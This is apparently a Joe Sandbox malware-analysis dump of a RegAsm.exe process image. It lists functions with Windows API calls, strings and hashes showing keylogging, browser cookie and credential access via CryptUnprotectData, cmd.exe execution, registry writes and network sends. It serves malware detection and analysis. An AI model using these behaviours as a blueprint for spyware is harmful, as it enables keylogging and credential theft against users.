                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFileKeyboardLayoutNameconnectsend
                                  • String ID: XQG$NG$PG
                                  • API String ID: 1634807452-3565412412
                                  • Opcode ID: 540faca1283a201b615fa294366106f171e649dc374ea9aa343cf977934f0195
                                  • Instruction ID: e0ccbd324811511655e6ba18c086c0ffec884fa52ef92f7e14ea490dcf81b303
                                  • Opcode Fuzzy Hash: 540faca1283a201b615fa294366106f171e649dc374ea9aa343cf977934f0195
                                  • Instruction Fuzzy Hash: BA5133315082415AC324F732D852AEFB3E5AFD4348F50493FF44A671E6EF78594AC649
                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: `#D$`#D
                                  • API String ID: 885266447-2450397995
                                  • Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                  • Instruction ID: d0478598ef992627c852fcfbe86add3ca1c9fa58067414995f231753f3186543
                                  • Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                  • Instruction Fuzzy Hash: 78519071A00208AFDF18DF59C980AAEBBB2FB94314F59C19AF81897361D7B9DD41CB44
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443475
                                  • _free.LIBCMT ref: 00443540
                                  • _free.LIBCMT ref: 0044354A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$FileModuleName
                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  • API String ID: 2506810119-1068371695
                                  • Opcode ID: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                  • Instruction ID: 78b8e4ab202bb8962dfea6a4c95dea7b8c186c0554b41bb8e719afd17783d6d0
                                  • Opcode Fuzzy Hash: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                  • Instruction Fuzzy Hash: 2E31C471A00258BFEB21DF999C8199EBBBCEF85B15F10406BF50497311D6B89F81CB98
                                  APIs
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                    • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,6D3B8300,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                    • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                                    • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                                    • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                  • Sleep.KERNEL32(000000FA,00465E74), ref: 00404138
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                  • String ID: /sort "Visit Time" /stext "$0NG
                                  • API String ID: 368326130-3219657780
                                  • Opcode ID: 765a2cec5dfc93fc14e6a06a83629ca65ec94325b3245c099cb6fcf10de14a30
                                  • Instruction ID: 62b88373b0174ac8ae4090b78ebfd0a8fca35ca34796720d8357018cc2c92f87
                                  • Opcode Fuzzy Hash: 765a2cec5dfc93fc14e6a06a83629ca65ec94325b3245c099cb6fcf10de14a30
                                  • Instruction Fuzzy Hash: E9316271A0011956CB15FBA6D8969EE7375AB90308F40007FF206B71E2EF385D89CA99
                                  APIs
                                  • _wcslen.LIBCMT ref: 004162F5
                                    • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                    • Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                    • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                    • Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _wcslen$CloseCreateValue
                                  • String ID: !D@$okmode$PG
                                  • API String ID: 3411444782-3370592832
                                  • Opcode ID: 56d367afe2ba597d6a39c7afb1f52fa5ab03872d574dd40714d897b86eaaf0d3
                                  • Instruction ID: dff749dc984b923ba5de2327a6f3f9cc2e67bcaf748228c26ce3aec7d70e92d7
                                  • Opcode Fuzzy Hash: 56d367afe2ba597d6a39c7afb1f52fa5ab03872d574dd40714d897b86eaaf0d3
                                  • Instruction Fuzzy Hash: 10119371B442011ADB187B72D832ABD22969F94358F80443FF54AAF2E2DEBD4C51525D
                                  APIs
                                    • Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
                                  • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C688
                                  Strings
                                  • User Data\Default\Network\Cookies, xrefs: 0040C603
                                  • User Data\Profile ?\Network\Cookies, xrefs: 0040C635
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExistsFilePath
                                  • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                  • API String ID: 1174141254-1980882731
                                  • Opcode ID: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
                                  • Instruction ID: e6b9b9a8142aca5ff9e4641a3ff80a721fb4b0471daa7637ae592fad8ebd6223
                                  • Opcode Fuzzy Hash: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
                                  • Instruction Fuzzy Hash: B421037190011996CB14F7A2DC96CEEB738EE50319F40053FB502B31D2EF789A46C698
                                  APIs
                                    • Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
                                  • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C757
                                  Strings
                                  • User Data\Default\Network\Cookies, xrefs: 0040C6D2
                                  • User Data\Profile ?\Network\Cookies, xrefs: 0040C704
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExistsFilePath
                                  • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                  • API String ID: 1174141254-1980882731
                                  • Opcode ID: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
                                  • Instruction ID: 83f6a23093d6b0727a30a1d550f3d6f5bdb2bb72864fa742cd8a9fd6423befd9
                                  • Opcode Fuzzy Hash: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
                                  • Instruction Fuzzy Hash: AE21D37190011AD6CB05F7A2DC96CEEB778EE50719B50013FF502B31D2EF789A46C698
                                  APIs
                                  • CreateThread.KERNEL32(00000000,00000000,0040A27D,?,00000000,00000000), ref: 0040A1FE
                                  • CreateThread.KERNEL32(00000000,00000000,0040A267,?,00000000,00000000), ref: 0040A20E
                                  • CreateThread.KERNEL32(00000000,00000000,0040A289,?,00000000,00000000), ref: 0040A21A
                                    • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B172
                                    • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateThread$LocalTimewsprintf
                                  • String ID: Offline Keylogger Started
                                  • API String ID: 465354869-4114347211
                                  • Opcode ID: 052d9f24e9ed53101c9c6e29893d10a0ebf43ddb848004275c2ad0d2f900b3d6
                                  • Instruction ID: bcf1cfbdc14a627f6781ea3a40f7cea6448602225ce5b2be95dc640702f6c2bd
                                  • Opcode Fuzzy Hash: 052d9f24e9ed53101c9c6e29893d10a0ebf43ddb848004275c2ad0d2f900b3d6
                                  • Instruction Fuzzy Hash: DE1194B12003187AD220B7369C86CBB765DDA8139CB00057FF946222D2EA795D54CAFB
                                  APIs
                                    • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B172
                                    • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                    • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040AF6E
                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040AF7A
                                  • CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AF86
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateThread$LocalTime$wsprintf
                                  • String ID: Online Keylogger Started
                                  • API String ID: 112202259-1258561607
                                  • Opcode ID: 1301e6b876f99197b04564c733fafc78f062806f1783c7b989fb50bec4e70a22
                                  • Instruction ID: a86b307176fed80e65d2d8085b20e14cf0e56bf63d45b36b749a5edd9f3e52e0
                                  • Opcode Fuzzy Hash: 1301e6b876f99197b04564c733fafc78f062806f1783c7b989fb50bec4e70a22
                                  • Instruction Fuzzy Hash: 1401C8A070031939E62076365C87D7F7A5DCA81398F40057FF645362C6D97D1C5586FB
                                  APIs
                                  • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406A82
                                  • GetProcAddress.KERNEL32(00000000), ref: 00406A89
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: CryptUnprotectData$crypt32
                                  • API String ID: 2574300362-2380590389
                                  • Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                  • Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
                                  • Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                  • Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4
                                  APIs
                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                  • CloseHandle.KERNEL32(?), ref: 004051CA
                                  • SetEvent.KERNEL32(?), ref: 004051D9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEventHandleObjectSingleWait
                                  • String ID: Connection Timeout
                                  • API String ID: 2055531096-499159329
                                  • Opcode ID: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
                                  • Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
                                  • Opcode Fuzzy Hash: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
                                  • Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59
                                  APIs
                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E833
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Exception@8Throw
                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                  • API String ID: 2005118841-1866435925
                                  • Opcode ID: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
                                  • Instruction ID: aca7d9cae529c24a85643cb8f0975e7fdd15ab88b82278639a3f13e82648cb6f
                                  • Opcode Fuzzy Hash: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
                                  • Instruction Fuzzy Hash: 2C01B1315443086AE618F693C843FAA73585B10708F108C2FAA15761C2F67D6961C66B
                                  APIs
                                  • RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041381F
                                  • RegSetValueExW.ADVAPI32(004752D8,?,00000000,00000001,00000000,00000000,004752F0,?,0040F823,pth_unenc,004752D8), ref: 0041384D
                                  • RegCloseKey.ADVAPI32(004752D8,?,0040F823,pth_unenc,004752D8), ref: 00413858
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseCreateValue
                                  • String ID: pth_unenc
                                  • API String ID: 1818849710-4028850238
                                  • Opcode ID: 0de8c57798d2a052ed48f9ba6d58c7c81afdedd1aa2e5c5a2a8de63742f16a74
                                  • Instruction ID: 91b44a8789fefabe47d0aed0b401f4e945a8dec35bb1902c17c37083bf943f80
                                  • Opcode Fuzzy Hash: 0de8c57798d2a052ed48f9ba6d58c7c81afdedd1aa2e5c5a2a8de63742f16a74
                                  • Instruction Fuzzy Hash: 83F0C271440218FBDF10AFA1EC45FEE376CEF00B56F10452AF905A61A1E7359F04DA94
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFB1
                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFF0
                                    • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 0043565F
                                    • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 00435683
                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E016
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                  • String ID: bad locale name
                                  • API String ID: 3628047217-1405518554
                                  • Opcode ID: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
                                  • Instruction ID: c9d4814c50014869750c7e26a4e1a69426a580a77e14145940ab7c7d7e24a8db
                                  • Opcode Fuzzy Hash: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
                                  • Instruction Fuzzy Hash: EAF081314006049AC634FA62D863B9AB7B89F14718F504A7FB906228D1EF7CBA1CCA4C
                                  APIs
                                  • CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
                                  • ShowWindow.USER32(00000009), ref: 00416C61
                                  • SetForegroundWindow.USER32 ref: 00416C6D
                                    • Part of subcall function 0041CD9B: AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                                    • Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                    • Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                                  • String ID: !D@
                                  • API String ID: 3446828153-604454484
                                  • Opcode ID: b7364eaafb7a437eec89ed9fb4143899ef50b32a2d873a0c8232afd7958e43d5
                                  • Instruction ID: c1d0571eb829819ca76672189d51ce116019f2d3a91c4b5ec781e9fa27a10d2f
                                  • Opcode Fuzzy Hash: b7364eaafb7a437eec89ed9fb4143899ef50b32a2d873a0c8232afd7958e43d5
                                  • Instruction Fuzzy Hash: 9EF05E70158201EAD720AB62EC45AFA7B69EB54351F00483BF849D14F2DB398C85C69D
                                  APIs
                                  • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExecuteShell
                                  • String ID: /C $cmd.exe$open
                                  • API String ID: 587946157-3896048727
                                  • Opcode ID: 64774f0173dd2414335a6a01ca4130183aa4f4d30cf83fc1238f67c292a9c67a
                                  • Instruction ID: 0a18f3537a1213b4b5dca9b82f73c842755a7e35c30cee8a650de64661b344da
                                  • Opcode Fuzzy Hash: 64774f0173dd2414335a6a01ca4130183aa4f4d30cf83fc1238f67c292a9c67a
                                  • Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659
                                  APIs
                                  • TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                  • UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                  • TerminateThread.KERNEL32(0040A267,00000000,?,pth_unenc), ref: 0040B8D5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: TerminateThread$HookUnhookWindows
                                  • String ID: pth_unenc
                                  • API String ID: 3123878439-4028850238
                                  • Opcode ID: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
                                  • Instruction ID: 1c21f009177841ea8acfe7f5b61a435624369701cc7e40c150536a334dec3301
                                  • Opcode Fuzzy Hash: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
                                  • Instruction Fuzzy Hash: 4AE01272205356EFD7241FA09C988267BEEDA0478A324487EF2C3626B1CA794C10CB5D
                                  APIs
                                  • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                  • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressHandleModuleProc
                                  • String ID: GetCursorInfo$User32.dll
                                  • API String ID: 1646373207-2714051624
                                  • Opcode ID: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                                  • Instruction ID: 65f79b4a2c2aed896b4012a4b0ac893fb7d0ccba54e760513c8834f3bef68171
                                  • Opcode Fuzzy Hash: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                                  • Instruction Fuzzy Hash: B4B09B70541740E7CB106BF45C4F9153555B514703B105476B44996151D7B44400C61E
                                  APIs
                                  • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
                                  • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: GetLastInputInfo$User32.dll
                                  • API String ID: 2574300362-1519888992
                                  • Opcode ID: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                                  • Instruction ID: ea73ef4d1088e939c140d9431744cb36a9dcab52d5ea7f3e4bb33043e5d41cbe
                                  • Opcode Fuzzy Hash: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                                  • Instruction Fuzzy Hash: 5EB092B45C1700FBCB106FA4AC4E9293AA9A614703B1088ABB845D2162EBB884008F9F
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __alldvrm$_strrchr
                                  • String ID:
                                  • API String ID: 1036877536-0
                                  • Opcode ID: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                                  • Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
                                  • Opcode Fuzzy Hash: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                                  • Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                  • Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
                                  • Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                  • Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788
                                  APIs
                                  Strings
                                  • Cleared browsers logins and cookies., xrefs: 0040C0F5
                                  • [Cleared browsers logins and cookies.], xrefs: 0040C0E4
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
                                  • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                  • API String ID: 3472027048-1236744412
                                  • Opcode ID: f04c9fcfc5d51e830be94f028420677c48269f78a09cd2570410497d2b162b15
                                  • Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
                                  • Opcode Fuzzy Hash: f04c9fcfc5d51e830be94f028420677c48269f78a09cd2570410497d2b162b15
                                  • Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF
                                  APIs
                                    • Part of subcall function 0041C551: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C561
                                    • Part of subcall function 0041C551: GetWindowTextLengthW.USER32(00000000), ref: 0041C56A
                                    • Part of subcall function 0041C551: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C594
                                  • Sleep.KERNEL32(000001F4), ref: 0040A573
                                  • Sleep.KERNEL32(00000064), ref: 0040A5FD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Window$SleepText$ForegroundLength
                                  • String ID: [ $ ]
                                  • API String ID: 3309952895-93608704
                                  • Opcode ID: e4ff9062ebc1855ffc8709a41a4aeb88848ac43e96cbaf8abbe5df7ed01e55c0
                                  • Instruction ID: 97bd403738d1ca0cb59e80c1fc79ee6201ed0cb329172f4776a94889a39aca56
                                  • Opcode Fuzzy Hash: e4ff9062ebc1855ffc8709a41a4aeb88848ac43e96cbaf8abbe5df7ed01e55c0
                                  • Instruction Fuzzy Hash: FE119F315043006BC614BB65CC5399F77A8AF50308F40053FF552665E2FF79AA5886DB
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e504ac4fddb0f8a25c6be19684a152be264dadb57d82260706401bb5bc5fb7a8
                                  • Instruction ID: 17f232e73e96fb976a24982deb7d35e81c220cd9520ca4ef7e8dcf180de91df6
                                  • Opcode Fuzzy Hash: e504ac4fddb0f8a25c6be19684a152be264dadb57d82260706401bb5bc5fb7a8
                                  • Instruction Fuzzy Hash: 1301F2B36497067EFA202E786CC1F67220CDF41BBEB34032BB574712D1DA68CE404568
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 253450334f16ac4bada5e464aed069c53fdbe8794578123440a1a1ba72333804
                                  • Instruction ID: 34d970f17befced98e3ca294e9c9a609e5e7bfbb0444a55afbb34e25ce639c56
                                  • Opcode Fuzzy Hash: 253450334f16ac4bada5e464aed069c53fdbe8794578123440a1a1ba72333804
                                  • Instruction Fuzzy Hash: 0601A2B26096117EFA111E796CC4E27624CDB81BBF325032BF535612D6DA688E014169
                                  APIs
                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
                                  • GetLastError.KERNEL32(?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2
                                  Memory Dump Source
